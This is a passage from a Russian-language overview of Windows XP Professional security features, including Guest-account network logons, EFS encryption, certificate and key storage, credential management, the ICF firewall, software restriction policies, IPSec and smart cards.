сравнению с Windows NT 4.0. Гости (Guests) могут регистрироваться по встроенной учетной записи Guest и выполнять ограниченный набор действий, в том числе выключать компьютер. Пользователи, не имеющие учетной записи на этом компьютере, или пользователи, чьи учетные записи отключены (но не удалены), могут зарегистрироваться на компьютере по учетной записи Guest. Можно устанавливать права доступа для этой учетной записи, которая по умолчанию входит во встроенную группу Guests. По умолчанию учетная запись Guest отключена. Можно сконфигурировать списки управления доступом (ACL) для групп ресурсов или групп безопасности и по мере необходимости добавлять/удалять из них пользователей или ресурсы, что облегчает управление правами доступа и их аудит. Это также позволяет реже изменять ACL. Можно предоставить пользователям права на доступ к файлам и папкам и указать действия, которые можно выполнять с ними. Можно также разрешить наследование прав доступа; при этом права доступа к некоторой папке применяются и к ее подкаталогам и находящимся в них файлам. При работе с Windows XP Professional в составе рабочей группы или в изолированном режиме вам предоставляются права администратора, и у вас есть все права по отношению ко всем функциям безопасности ОС. Если компьютер под управлением Windows XP Professional включен в сеть, параметры безопасности определяет сетевой администратор. Политика групп Параметры политики групп позволяют назначать ресурсам права доступа, а также предоставлять права доступа пользователям. Это нужно для того, чтобы требовать запуска определенных приложений только в заданном контексте безопасности (тем самым снижая риск воздействия на компьютер нежелательных приложений, например, вирусов) и конфигурировать различные права доступа для множества клиентских компьютеров. Можно сконфигурировать права доступа на эталонном компьютере, который будет использован как базовый образ для установки на другие рабочие станции, гарантируя, таким образом, стандартизованное управление безопасностью даже в отсутствие Active Directory. Функции аудита позволяют обнаруживать попытки отключить или обойти защиту ресурсов. Можно задействовать предварительно сконфигурированные шаблоны безопасности, соответствующие требованиям безопасности для данной рабочей станции или сети. Шаблоны безопасности - это файлы с предварительно установленными параметрами безопасности, которые применяют к локальному компьютеру или импортируют в групповые политики активного каталога (Active Directory). Шаблоны безопасности используются в неизменном виде или настраиваются в соответствии с определенными задачами. Шифрование EFS (Encrypting File System) позволяет зашифровать данные на жестком диске. Риск кражи портативных компьютеров особенно велик, а с помощью EFS можно усилить безопасность путем шифрования данных на жестких дисках портативных компьютеров компании. Эта предосторожность защищает информацию и идентификационные данные от несанкционированного доступа. Корпоративная безопасность Windows XP Professional поддерживает ряд функций защиты избранных файлов, приложений и других ресурсов. В их числе списки управления доступом (ACL), группы безопасности и групповая политика, а также средства конфигурирования и управления этими функциями. В совокупности они обеспечивают мощную, но гибкую инфраструктуру управления доступом в корпоративных сетях. Windows XP поддерживает тысячи относящихся к безопасности параметров конфигурации, которые можно применять и по отдельности. В Windows XP также есть предопределенные шаблоны безопасности, обычно используемые без изменений или как основа для особой настройки конфигурации безопасности. Эти шаблоны безопасности применяются при: создании ресурса, такого как общая папка или файл; при этом вы вправе воспользоваться заданными по умолчанию ACL или настроить их в соответствии со своими потребностями; распределении пользователей по стандартным группам безопасности, таким как Users, Power Users и Administrators, и принятии заданных по умолчанию параметров ACL; использовании предоставляемых ОС шаблонов групповой политики - Basic (основной), Compatible (совместимый), Secure (безопасный) или Highly Secure (высокобезопасный). Каждая из особенностей системы безопасности Windows XP - списки ACL, группы безопасности и групповая политика - имеет параметры по умолчанию, которые разрешается изменять в соответствии с требованиями организации. Предприятия также вправе применять соответствующие средства для реализации и настройки управления доступом. Многие из этих средств, такие как оснастки Microsoft Management Console, представляют собой компоненты Windows XP Professional, другие поставляются в составе комплекта ресурсов Windows XP Professional Resource Kit. Управляемый доступ к сети Windows XP содержит встроенную подсистему безопасности для предотвращения вторжений. Ее работа базируется на ограничении прав любого, кто пытается получить доступ к компьютеру из сети до привилегий гостевой учетной записи. Взломщикам или вообще не удастся получить доступ к компьютеру и перебором паролей получить дополнительные привилегии, или они получат только ограниченный гостевой доступ. Управление сетевой проверкой подлинности Все большее число систем под управлением Windows XP Professional подключается к Интернету напрямую, а не через домены. Поэтому продуманная система управления доступом (в том числе устойчивыми паролями и разрешениями, сопоставленными учетными записями) важна как никогда ранее. Для обеспечения безопасности следует избегать анонимных параметров управления доступом, обычно связанных с открытыми средами, подобными Интернету. Вот почему в Windows XP Professional по умолчанию все пользователи, вошедшие по сети, работают под учетной записью Guest. Это исключает для злоумышленника возможность войти в систему через Интернет под локальной учетной записью Администратор (Administrator), у которой нет пароля. Упрощенное совместное использование ресурсов Модель совместного использования и безопасности для локальных учетных записей позволяет выбрать модель безопасности на основе применения исключительно гостевой учетной записи (Guest) либо классическую (Classic) модель безопасности. В гостевой модели при любых попытках войти в систему локального компьютера через сеть применяется только гостевая учетная запись. В классической модели пользователи при доступе через сеть входят в систему локального компьютера под своими учетными записями. На компьютерах в составе домена эта политика не применяется, а по умолчанию используется гостевая учетная запись. Если гостевая учетная запись существует и ей назначен пустой пароль, сетевые пользователи смогут войти в систему и получить доступ к любому ресурсу, разрешенному для доступа учетной записи Guest. При включенной политике "force network logons using local accounts to authenticate as Guest" локальные учетные записи должны аутентифицироваться как учетная запись Guest при доступе через сеть. Эта политика служит для ограничения разрешений локальной учетной записи, обращающейся к системным ресурсам на другом сетевом компьютере. Кроме того, на компьютерах, поддерживающих модель упрощенной защиты общих ресурсов, диалоговое окно Security Properties заменено упрощенным диалоговым окном Shared Documents Properties. Ограничение на учетные записи с пустыми паролями Для безопасности пользователей, не защитивших свою учетную запись паролем, в Windows XP Professional такие учетные записи разрешено применять только для входа в систему компьютера с его консоли. По умолчанию учетные записи с пустыми паролями запрещено применять для входа в систему удаленно по сети и вообще для любых других действий по входу в систему, кроме как с физической консоли компьютера. Например, нельзя задействовать службу вторичного входа в систему (RunAs - запуск от имени) для запуска программ под учетной записью с пустым паролем локального пользователя. Назначение пароля локальной учетной записи устраняет указанное ограничение на вход через сеть, а также предоставляет ей доступ по сети к любым ресурсам, на которые у нее есть права. Если ваш компьютер не расположен в физически защищенном помещении, рекомендуется назначать пароли всем локальным учетным записям пользователей. Несоблюдение этого требования ведет к тому, что любой пользователь, получивший физический доступ к компьютеру, может войти в систему под учетной записью без пароля. Это особенно важно для переносных компьютеров, на которых следует предусмотреть устойчивые пароли для всех локальных учетных записей пользователей. Указанное ограничение не относится к доменным учетным записям, а также к локальной гостевой учетной записи. Если учетная запись Guest с пустым паролем существует, под ней можно войти в систему и обратиться к любому ресурсу, разрешенному ей для доступа. Если требуется отключить ограничение на вход через сеть без пароля, надо соответствующим образом настроить локальную политику безопасности (Local Security Policy). Шифрованная файловая система Дополнительные функции шифрованной файловой системы (Encrypting File System, EFS) существенно обогатили Windows XP Professional, обеспечив дополнительную гибкость для корпоративных пользователей при развертывании решений безопасности, основанных на шифровании файлов с данными. Любой злоумышленник, имеющий физический доступ к компьютеру, может загрузить на нем другую ОС, обойти защиту основной ОС и получить доступ к конфиденциальным данным. Шифрование конфиденциальных файлов средствами EFS обеспечивает дополнительную защиту. Данные зашифрованного файла останутся недоступными, даже если атакующий получит полный доступ к среде хранения данных компьютера. Только полномочные пользователи и назначенные агенты восстановления данных в состоянии расшифровывать файлы. Пользователи с другими учетными записями, обладающие разрешениями для файла - даже разрешением на передачу прав владения (Take Ownership), не в состоянии открыть его. Администратору доступ к содержимому файла также закрыт, если только он не назначен агентом восстановления данных. При попытке несанкционированного доступа к зашифрованному файлу система откажет в доступе. Архитектура EFS EFS базируется на технологии шифровании с открытым ключом и использует архитектуру CryptoAPI. Стандартная (по умолчанию) конфигурация EFS не требует никакого административного вмешательства: вы вправе выполнять шифрование файлов сразу же после установки системы. EFS автоматически создает пару ключей шифрования и сертификат пользователя, если они не были созданы ранее. В качестве алгоритма шифрования EFS использует DESX (Expanded Data Encryption Standard) или 3DES (Triple-DES). Поставщики услуг криптографии поддерживают два алгоритма: RSA Base и RSA Enhanced - для создания сертификатов EFS и для шифрования симметричных ключей шифрования. Если зашифровать папку, все файлы и подпапки в ней шифруются автоматически. Рекомендуется шифрование именно на уровне папок, чтобы в процессе работы не появлялись незашифрованные временные файлы. EFS и NTFS Шифрованная файловая система (EFS) защищает конфиденциальные данные в файлах на томах NTFS. EFS - основная технология шифрования и расшифровки файлов на томах NTFS. Открывать файл и работать с ним может только пользователь, его зашифровавший. Это чрезвычайно важно для пользователей переносных компьютеров: даже если взломщик получит доступ к потерянному или украденному компьютеру, он не сможет открыть зашифрованные файлы. В Windows XP шифрованная файловая система также поддерживает автономные файлы и папки (Offline Files and Folders). Зашифрованный файл останется недоступным для просмотра в исходном виде, даже если атакующий обойдет системную защиту, например, загрузив другую ОС. EFS обеспечивает устойчивое шифрование по стандартным алгоритмам и тесно интегрирована с NTFS. EFS в Windows XP Professional предоставляет новые возможности совместного использования зашифрованных файлов или отключения агентов восстановления данных, а также облегчает управление посредством групповой политики и служебных программ командной строки. Как работает EFS EFS позволяет сохранить конфиденциальность информации на компьютере в условиях, когда люди, имеющие физический доступ к компьютеру, могут преднамеренно или неумышленно скомпрометировать ее. EFS чрезвычайно удобна для обеспечения конфиденциальности данных на мобильных компьютерах или на компьютерах, на которых работают несколько пользователей, т. е. таких системах, которые могут подвергаться атакам, предусматривающим обход ограничений списков ACL. В совместно используемой системе атакующий обычно получает несанкционированный доступ, загружая другую ОС. Злоумышленник также может захватить компьютер, вынуть жесткий диск, поместить его на другой компьютер и получить доступ к файлам. Однако если у него нет ключа расшифровки, зашифрованный средствами EFS файл будет выглядеть как бессмысленный набор символов. Поскольку EFS тесно интегрирована с NTFS, шифрование и расшифровка выполняются незаметно ("прозрачно") для пользователя. При открытии файла EFS автоматически расшифровывает его по мере чтения данных с диска, а при записи - шифрует данные при записи на диск. Работая с зашифрованным файлом, вы можете даже не догадываться, что он зашифрован (при условии, что у вас есть соответствующие права). В стандартной конфигурации EFS позволяет зашифровать файл прямо из Проводника Windows без какого-либо вмешательства администратора. С точки зрения пользователя шифрование файла или папки - это просто назначение ему определенного атрибута. Конфигурирование EFS По умолчанию система поддерживает работу EFS. Разрешается шифровать файлы, для которых имеется разрешение на изменение. Поскольку в EFS для шифрования файлов применяется открытый ключ, нужно создать пару ключей открытый/закрытый и сертификат с открытым ключом шифрования. В EFS разрешены сертификаты, подписанные самим владельцем, поэтому вмешательство администратора для нормальной работы не требуется. Если применение EFS не соответствует требованиям организации или если есть файлы, которые нельзя шифровать, существует много способов отключить EFS или нужным образом конфигурировать ее. Для работы с EFS всем пользователям требуются сертификаты EFS. Если в организации нет инфраструктуры открытого ключа (Public Key Infrastructure, PKI), применяются подписанные самим владельцем сертификаты, которые автоматически создаются ОС. При наличии центров сертификации сертификаты EFS обычно выпускают именно они. Если вы используете EFS, обязательно предусмотрите план восстановления данных при сбое системы. Что разрешается шифровать На томах NTFS атрибут шифрования разрешается назначать отдельным файлам и папкам с файлами (или подпапками). Хотя папку с атрибутом шифрования и называют "зашифрованной", сама по себе она не шифруется, и для установки атрибута пары ключей не требуется. При установленном атрибуте шифрования папки EFS автоматически шифрует: все новые файлы, создаваемые в папке; все незашифрованные файлы, скопированные или перемещенные в папку; все вложенные файлы и подпапки (по особому требованию); автономные файлы. Шифрование базы данных автономных файлов В Windows XP можно шифровать базу данных автономных файлов для локальной защиты кэшируемых документов от воровства компьютера, а также обеспечения дополнительной безопасности локально кэшируемых данных. В Windows 2000 этой функции не было - она предусматривает шифрование кэшируемых файлов. Например, вы вправе активно использовать автономные файлы, при этом конфиденциальность данных обеспечивается автоматически. Как администратор отдела технической поддержки вы можете задействовать эту возможность, чтобы обезопасить все локально кэшируемые документы. Автономные файлы - превосходная защита от потери конфиденциальных данных при захвате мобильного компьютера. Указанная функция поддерживает шифрование и расшифровку всей автономной базы данных. Для конфигурирования порядка шифрования автономных файлов нужны административные привилегии. Чтобы зашифровать автономные файлы, откройте папку Мой компьютер (My Computer) и в меню Сервис (Tools) выберите команду Свойства папки (Folder Options), в открывшемся окне свойств на вкладке Автономные файлы (Offline Files) установите флажок Шифровать автономные файлы для защиты данных (Encrypt Offline Files To Secure Data). Удаленные операции EFS на общих файлах и Web-папках Можно шифровать и расшифровывать файлы, расположенные в Web-папках Web Distributed Authoring and Versioning (распределенная система хранения файлов с доступом через Web), или WebDAV. У Web-папок много преимуществ по сравнению с общими файлами, и Microsoft рекомендует максимально широко применять их для удаленного хранения шифрованных файлов. Web-папки требуют меньше внимания от администраторов и безопаснее, чем общие файлы. Web-папки также обеспечивают безопасное хранение и доставку шифрованных файлов через Интернет средствами стандартного протокола HTTP. Чтобы использовать общие файлы для удаленных операций EFS, требуется доменная среда Windows 2000 или более поздних версия Windows, так как при шифровании и расшифровке пользовательских файлов EFS работает от имени пользователя посредством протокола делегирования полномочий в Kerberos. Основное отличие удаленных операций EFS с общими файлами и файлами в Web-папках - то, в каком месте эти операции выполняются. Если файлы хранятся в общих файлах, все операции EFS выполняются на компьютере, где расположен файл. Так, если вы подключились к общему сетевому файлу и пытаетесь открыть ранее зашифрованный файл, он расшифровывается на компьютере, где хранится, а затем передается открытым текстом по сети на ваш компьютер. При хранении файла на Web-папках все операции EFS выполняются на локальном компьютере. Скажем, при подключении к Web-папке и попытке открыть зашифрованный файл последний пересылается по сети в зашифрованном виде на локальный компьютер и уже там расшифровывается системой EFS. Входящий и исходящий трафик Web-папок - это необработанные данные, которые, даже перехваченные атакующим, остаются зашифрованными и совершенно для него бесполезны. Такое различие в выполнении операций EFS объясняет, почему общие файлы требуют больших усилий со стороны администраторов, чем Web-папки. EFS с Web-папками устраняет необходимость в специализированном ПО для безопасного совместного использования зашифрованных файлов пользователями и организациями. Файл может храниться в свободном доступе на файловых серверах в интрасети или в Интернете и при этом оставаться надежно защищенным средствами EFS. Службы сертификации Службы сертификации - это компонент базовой ОС, позволяющий ей выполнять функции центра сертификации (certification authority, CA), или ЦС, в том числе выпускать цифровые сертификаты и управлять ими. Windows XP Professional поддерживает многоуровневые иерархии ЦС и сети ЦС с перекрестными доверительными отношениями, а также изолированные и интерактивные ЦС. Хранилища сертификатов с открытыми ключами Windows XP Professional хранит сертификаты с открытыми ключами в личном (Personal) хранилище сертификатов. Они хранятся открытым текстом, так как это общедоступная информация. Сертификаты имеют цифровую подпись ЦС для предотвращения изменения. Сертификаты пользователя расположены в папке Documents and Settings\<имя_пользователя>\ApplicationData\Microsoft\ SystemCertificates\My\Certificates профиля пользователя. Эти сертификаты записываются в локальном реестре при каждом входе в систему компьютера. Для перемещаемых профилей сертификаты обычно хранятся в определенном месте (не на компьютере) и "следуют" за пользователем при его входе в систему любого компьютера в домене. Хранение закрытых ключей Поставщики услуг криптографии (cryptographic service provider, CSP) - как Base CSP, так и Enhanced CSP, хранят закрытые ключи в профиле пользователя в папке %SystemRoot%\Documents and Settings\<имя_пользователя>\ Application Data\Microsoft\Crypto\RSA. В перемещаемых профилях пользователей закрытый ключ располагается в папке RSA на контроллере домена и загружается на компьютер только на время его работы. Поскольку закрытые ключи надо защищать, все файлы в папке RSA автоматически шифруются случайным симметричным ключом - основным ключом пользователя (user's master key). Ключ длиной в 64 символа создается надежным генератором случайных чисел. На базе основного ключа создаются ключи 3DES, используемые для шифрования закрытых ключей. Основной ключ автоматически генерируется и периодически возобновляется. При хранении на диске основной ключ защищается по алгоритму Triple DES с применением ключа, созданного на основе вашего пароля. Основной ключ применяется для автоматического шифрования всех файлов в папке RSA по мере их создания. Автоматический запрос сертификата пользователя В Windows 2000 имелась функция автоматического запроса сертификата пользователя. Автоматический запрос сертификата компьютера и контроллера домена поддерживается и групповой политикой Microsoft Active Directory. Автоматический запрос сертификата компьютера чрезвычайно полезен для упрощения подключений по IPSec или L2TP/IPSec VPN к серверам с Windows XP со службой Routing и Remote Access и другим серверам. Эта функция снижает совокупную стоимость владения и упрощает управление жизненным циклом сертификатов для пользователей и администраторов. Автоматический запрос сертификата смарт-карты и ЦС с самоподписанными сертификатами обеспечивают дополнительную защиту пользователям предприятий, где требуется усиленная безопасность. Запросы в ожидании и обновление сертификатов Автоматический запрос сертификата пользователя в Windows XP Professional обеспечивает также запросы в ожидании и обновление сертификатов. После запроса сертификата вручную или автоматически на сервере сертификации Windows .NET Server CA ожидается разрешение администратора на выпуск сертификата или завершение процесса верификации. После одобрения и выпуска сертификата механизм автоматического запроса автоматически установит сертификат. В процессе обновления сертификатов пользователя с истекшим сроком действия также применяется механизм автоматического запроса. Сертификаты автоматически обновляются от имени пользователя, причем процедура определяется параметрами шаблонов сертификатов в Active Directory. По умолчанию сертификаты и ключи защищены. Для дополнительной защиты вы вправе применить дополнительные меры безопасности, в том числе выполнять экспорт закрытых ключей и хранить их в защищенном месте. Управление реквизитами Управление реквизитами в Windows XP состоит из трех компонентов: интерфейс пользователя для ввода реквизитов, хранилище имен и паролей пользователя и связка ключей (keyring). Интерфейс пользователя для ввода реквизитов Приложение отображает интерфейс пользователя для ввода реквизитов, если компонент аутентификации возвратил ошибку проверки подлинности. (Это касается только приложений, в которых такой интерфейс реализован.) Вам предлагается ввести имя пользователя и пароль в соответствующем диалоговом окна или выбрать сертификат X.509 из хранилища My Store. Приложение также может предусматривать флажок Remember my password (Запомнить пароль), при установке которого реквизиты запоминаются. Сохранение реквизитов поддерживают только интегрированные с Windows XP компоненты проверки подлинности (например, Kerberos, NTLM, SSL). Для базовой проверки подлинности отображается интерфейс пользователя для ввода реквизитов, но возможности сохранения реквизитов нет. Хранилище реквизитов пользователя Реквизиты перемещаемых профилей хранятся в защищенном хранилище Stored User Names and Passwords (Сохраненные имя и пароль пользователя). Порядок доступа к реквизитам определяют параметры локальной защиты (Local Security Settings). Реквизиты хранятся на основе целевой информации, возвращенной ресурсом. Когда установлен флажок Remember my password в интерфейсе запроса реквизитов, реквизиты сохраняются в наиболее общей форме. Скажем, после обращения к определенному серверу в домене реквизиты сохраняются в форме *.domain.com. При сохранении разных реквизитов для разных серверов в этом домене указанная запись не перезаписывается, а создаются более конкретные записи о целевой информации. При обращении к ресурсу с применением интегрированного компонента проверки подлинности последний выберет среди сохраненных реквизитов пользователей наиболее близко соответствующие целевой информации, возвращенной ресурсом. Найдя нужные реквизиты, компонент ничего не будет спрашивать у пользователя. В случае неудачи поиска реквизитов приложению, которое пыталось обращаться к ресурсу, возвращается ошибка аутентификации. Приложение, обращающееся к ресурсу, не обязательно должно реализовывать интерфейс пользователя для ввода реквизитов. Если оно взаимодействует с интегрированным компонентом проверки подлинности, последний и выполняет поиск реквизитов. В действительности сохраненные реквизиты сможет получить только компонент проверки подлинности. Для Windows XP Professional в составе домена используется классический интерфейс пользователя для ввода реквизитов, а в Windows XP Home Edition и Windows XP Professional в рабочей группе - новый дружественный интерфейс пользователя. Связка ключей Связка ключей (keyring) позволяет вручную управлять сохраненными реквизитами. Для работы с ней служит элемент User Accounts Панели управления. В связке ключей отображается список сохраненных реквизитов. При выделении реквизита в поле описания в нижней части окна отображается его краткое описание. Можно добавлять новые реквизиты, редактировать и удалять существующие. При добавлении реквизитов система представит диалоговое окно, похожее на интерфейс пользователя для ввода реквизитов, и попросит указать целевую информацию. В целевой информации разрешается использовать символы подстановки в виде звездочки (*). Редактирование реквизитов позволяет самостоятельно изменить целевую информацию или сами реквизиты. Здесь можно изменить имя пользователя и пароль на сервере. Не разрешается применять интерфейс пользователя для ввода реквизитов и редактирования реквизитов, созданных конкретным приложением. Например, не удастся отредактировать реквизиты паспорта. Но вы вправе удалять любые реквизиты. Возможность сохранять реквизиты обычно определяется в групповой политике. Чтобы разработчики могли использовать механизм сохранения реквизитов, API запроса реквизитов и другие базовые API описаны в соответствующем комплекте Platform Software Development Kit (SDK). Быстрое переключение пользователей Быстрое переключение пользователей в Windows XP Professional доступно, только когда компьютер работает в составе рабочей группы или изолированно. Если компьютер присоединен к домену, параметры входа в систему компьютера определяются политикой, заданной администратором. На компьютерах с Windows XP Professional, которые не работают в составе домена, разрешается переключаться между сессиями разных пользователей без выхода из системы и закрытия приложений. Названные возможности обеспечивает технология поддержки и хранения пользовательских сессий, аналогичная той, что применяется в терминальной службе Microsoft Windows 2000 Terminal Services. Смена пользователя выполняется буквально в мгновение ока "горячими клавишами" я+L или через меню выключения компьютера. В результате не будет закрыто ни одно приложение, а значит, не нужно ломать голову над тем, сохранять ли файлы другого пользователя - вся рабочая обстановка будет сохранена такой, какая она есть. Очередному пользователю Windows выведет окно приглашения, которое, кстати, легко настроить и оформить картинками по своему вкусу. Разумеется, на сохранение каждого рабочего сеанса потребуется столько оперативной памяти, сколько нужно для хранения приложений, выполняемых в сеансах, плюс еще дополнительно 2 Мбайт на каждый сеанс. Поэтому для надежной поддержки нескольких пользователей рекомендуется компьютер с объемом ОЗУ не менее 128 Мбайт. Приложения, сохраняемые в фоновых сессиях, продолжают работать - скажем, почтовая программа другого пользователя будет продолжать принимать почту! Если система настроена на переход в "спящий" режим (hibernation mode) после приостановки работы, то все сеансы будут сохранены на жестком диске и восстановятся после включения компьютера. Быстрое переключение пользователей разрешено для версий Windows XP Home Edition или Windows XP Professional на изолированном компьютере или компьютере в составе рабочей группы. При присоединении компьютера под управлением Windows XP Professional к домену эта функция отключается. Личная конфиденциальность Возможности обеспечения личной конфиденциальности в Windows XP Professional такие же, как и в Windows XP Home Edition. Они различаются при работе в домене или в составе рабочей группы и в изолированном режиме. В домене применяется назначенная администратором политика. Доступ к Интернету - Internet Connection Firewall Межсетевой экран Internet Connection Firewall в Windows XP Professional обеспечивает защиту настольных и переносных компьютеров при подключении к Интернету - особенно в случае постоянных подключений, таких как кабельные модемы и DSL. Групповая политика в ICF Характерная функция ICF в Windows XP Professional - зависящая от места групповая политика. Это удобно для мобильных пользователей, желающих обеспечить безопасность при работе на переносных компьютерах в местах общественного подключения к Интернету: в гостиницах, аэропортах и т. п. Когда компьютер с Windows XP Professional работает в составе домена, администратор домена обычно создает групповую политику, запрещающую поддержку ICF в корпоративной сети. Это облегчает работу как пользователя, так и администратора. Когда пользователь вернется домой или подключится к Интернету в общественном месте, межсетевой экран ICF снова заработает, так как указанная политика в той сети не действует. Как работает межсетевой экран Такую технологию, как фильтры пакетов на основании полной информации о пакете, межсетевой экран ICF использует совместно с компонентом ICS. Хотя ICF обычно и применяется только в изолированном режиме работы компьютера, его иногда используют для защиты общего адаптера и обеспечения безопасности домашней сети. По умолчанию фильтры пакетов межсетевого экрана ICF блокируют все незапрошенные пакеты из открытого сетевого интерфейса. Для этого ICF обращается к таблице трафика в Network Address Translation (NAT) и проверяет весь входящий трафик на соответствие своим правилам. Входные потоки данных пропускаются только при наличии соответствующей записи в таблице трафика NAT, созданной межсетевым экраном или другими средствами из внутренней защищенной сети. Иначе говоря, если источник сетевого сообщения находится вне защищенной сети, входящие данные отбрасываются. Межсетевой экран ICF в Windows XP Professional дает уверенность, что хакеры не смогут просканировать вашу систему или подключиться к ее ресурсам. Однако здесь имеется определенный компромисс: межсетевой экран затрудняет конфигурирование системы для работы в качестве сервера в Интернете. Межсетевой экран ICF в Windows XP Professional доступен, только когда компьютер включен в рабочую группу или в изолированную конфигурацию. В домене параметры ICF определяются политиками, назначенными администратором. Параметры групповой политики, относящиеся к безопасности С Windows XP поставляются шаблоны защиты, представляющие собой заранее сконфигурированные наборы политик безопасности, которые разрешается применять для обеспечения определенного уровня защиты пользовательских компьютеров. Шаблоны предусматривают несколько уровней защиты: низкий (low), средний (medium) и высокий (high). Существуют также определенные политики управления паролями: определение минимальной длины пароля; настройка интервала между обязательной сменой пароля; управление доступом к ресурсам и данным. Политика ограничения используемых приложений Эта политика предоставляет администраторам механизм определения и управления ПО, работающим в домене. Она позволяет ограничить круг приложений только разрешенным к выполнению ПО и запрещает работу нежелательных приложений, среди которых вирусы и "троянцы", а также другое ПО, вызывающее конфликты. Политика идентифицирует приложения по пути к файлу, хешу файла, подписанному сертификату Microsoft Authenticode или зоне Интернета. После идентификации система применяет политику, заданную администратором. Политика ограничения используемых приложений помогает защититься и от вирусов-сценариев, и от "троянцев". Администратор может разрешить выполнение только тех сценариев, которые подписаны определенными организациями, и работа таких вирусов-сценариев, как ILOVEYOU.VBS, станет невозможной. Политика также позволяет управлять тем, какие приложения пользователям разрешено устанавливать на своих компьютерах. Политика ограничения применяется и на изолированных компьютерах при конфигурировании политики локальной защиты. Она также интегрируется с групповой политикой и Active Directory. Можно задать разные политики ограничения используемых приложений для различных подмножеств пользователей или компьютеров. Компьютер Windows XP можно задействовать и для создания политики ограничения используемых приложений в среде Windows 2000. Windows 2000-компьютеры в домене игнорируют эту политику, компьютеры с Windows XP приводят ее в исполнение. Политика ограничения используемых приложений создается в оснастке Group Policy консоли управления Microsoft Management Console (MMC) и состоит из заданного по умолчанию правила, определяющего, разрешено или запрещено выполнение определенных программ. Стандартное правило предусматривает два варианта: unrestricted ("неограниченно") и disallowed ("запрещено"). Если стандартное правило установлено в режим unrestricted, администратор может определять исключения, т. е. указывать программы, которые запускать запрещено. Более безопасный подход - изначально установить общее запрещение (режим disallowed), а затем выбрать только те программы, которые запускать разрешено. Протокол IPSec Безопасность IP-сетей - почти стандартное требование в нынешнем деловом мире с Интернетом, интрасетями, отделениями и удаленным доступом. Поскольку конфиденциальная информация постоянно пересылается по сети, сетевые администраторы и другие специалисты службы поддержки должны обеспечить защиту этого трафика от: изменения данных при пересылке; перехвата, просмотра и копирования; несанкционированного олицетворения (или маскарадинга) определенных ролей; перехвата и повторного использования для получения доступа к конфиденциальным ресурсам (для этого обычно применяется зашифрованный пароль). Службы безопасности призваны обеспечить целостность, конфиденциальность и проверку подлинности данных, а также защиту от их повторного использования для получения доступа. Зачем нужен IPSec Протокол IP не имеет стандартного механизма безопасности, и IP-пакеты легко перехватывать, просматривать, изменять, пересылать повторно и фальсифицировать. Без защиты и открытые, и частные сети подвержены несанкционированному доступу. Внутренние атаки - это обычно результат слабой или вообще отсутствующей защиты интрасети. Риски внешних атак обусловлены подключением к Интернету и экстрасетям. Одно лишь основанное на паролях управление доступом пользователей не обеспечивает безопасности данных, пересылаемых по сети. Вот почему сообщество Internet Engineering Task Force (IETF) разработало IPSec - протокол сетевого уровня для проверки подлинности, целостности и конфиденциальности данных, а также защиту от повторов. Поддержка IPSec встроена в Windows 2000 и Windows XP Professional. Таким образом, эти системы - хорошая основа для создания защищенных интрасетей и связи через Интернет. В них применяются стандартные отраслевые алгоритмы шифрования и всеобъемлющий подход к управлению системой безопасности для защиты всего обмена по протоколу TCP/IP на обеих сторонах брандмауэра организации. В результате стратегия сквозной безопасности Windows 2000 и Windows XP Professional защищает и от внешних, и от внутренних атак. IP-безопасность располагается ниже транспортного уровня, сокращая усилия сетевых администраторов, которым обычно приходится обеспечивать защиту последовательно для каждого приложения. Развертывание протокола IPSec в Windows XP Professional и Windows 2000 позволяет обеспечить высокий уровень безопасности всей сети, при этом приложения на серверах и клиентах, поддерживающих IPSec, защищаются автоматически. Криптографические механизмы защиты Для предупреждения нападений в IPSec служат криптографические механизмы. Они защищают информацию путем хеширования и шифрования. Для защиты информации используются алгоритм и ключ. Алгоритм - это последовательность математических действий для преобразования информации, а ключ - секретный код или число, необходимый для чтения, изменения или проверки защищенных данных. Уровень безопасности для данного сеанса в IPSec определяется политикой. Политика обычно назначается в распределенных системах через контроллеры домена с Windows 2000 или создается и хранится локально в реестре компьютера с Windows XP Professional. IPSec в работе Перед передачей любых данных компьютер с поддержкой IPSec согласовывает с партнером по связи уровень защиты, используемый в сеансе. В процессе согласования определяются методы аутентификации, хеширования, туннелирования (при необходимости) и шифрования (также при необходимости). Секретные ключи проверки подлинности создаются на каждом компьютере локально на основании информации, которой они обмениваются. Никакие реальные ключи никогда не передаются по сети. После создания ключа выполняется проверка подлинности и начинается сеанс защищенного обмена данными. Уровень безопасности (высокий или низкий) определяется политиками IP-безопасности обменивающихся компьютеров. Скажем, для связи между компьютером с Windows XP Professional и компьютером, не поддерживающим IPSec, создание защищенного канала не требуется. С другой стороны, в сессии обмена между Windows 2000-сервером, содержащим конфиденциальные данные, и компьютером в интрасети обычно нужна высокая степень безопасности. Поддержка смарт-карт Смарт-карта - это устройство с интегральной схемой размером с кредитную карточку, предназначенное для безопасного хранения открытых и закрытых ключей, паролей и прочей личной информации. Она служит для операций шифрования с открытым ключом, проверки подлинности, введения цифровой подписи и обмена ключами. Смарт-карта предоставляет следующие функции: особо защищенное хранилище для закрытых ключей и другой частной информации; изоляцию чрезвычайно важных для безопасности вычислений, в том числе проверки подлинности, цифровой подписи и обмена ключами, от других компонентов системы, которые напрямую не работают с этими данными; свободу перемещения реквизитов пользователей и другой частной информации между компьютерами на работе и дома, а также удаленными компьютерами. PIN вместо пароля Для активизации смарт-карт применяются PIN-коды (Personal Identification Number - персональный идентификационный номер), а не пароли. Код известен только владельцу смарт-карты, что повышает надежность защиты. Для активизации смарт-карты пользователь вводит ее в подключенное к компьютеру устройство чтения и в ответ на запрос системы вводит свой PIN-код. PIN-код надежнее обычных сетевых паролей. Пароли (или их производные, например, хеш) передаются по сети и подвержены атакам. Устойчивость пароля к взлому зависит от его длины, надежности механизма защиты пароля и от того, насколько трудно его угадать. С другой стороны, PIN-код никогда не передается по сети, и поэтому его нельзя перехватить анализатором пакетов. Дополнительное средство защиты - блокировка смарт-карты после нескольких неудачных попыток подряд ввести PIN-код, что сильно затрудняет подбор кода. Разблокировать смарт-карту может только администратор системы. Стандарты смарт-карт Windows 2000 работает со стандартными смарт-картами и устройствами чтения смарт-карт, поддерживающими спецификацию PC/SC (Personal Computer/Smart Card), определенную рабочей группой PC/SC Workgroup, а также технологию Plug and Play. Для поддержки спецификации PC/SC 1.0 в Windows смарт-карта должна конструктивно и по электрическим характеристикам соответствовать стандартам ISO 7816-1, 7816-2 и 7816-3. Устройства чтения смарт-карт подключают к стандартным интерфейсам периферийных устройств персонального компьютера, таким как RS-232, PS/2, PCMCIA и USB. Некоторые устройства чтения смарт-карт с интерфейсом RS-232 оборудованы дополнительным кабелем, подключаемым к порту PS/2 и используемым для питания устройства. PS/2-порт применяется только для питания, но не для передачи данных. Устройства чтения смарт-карт считаются стандартными устройствами Windows со своим дескриптором безопасности и 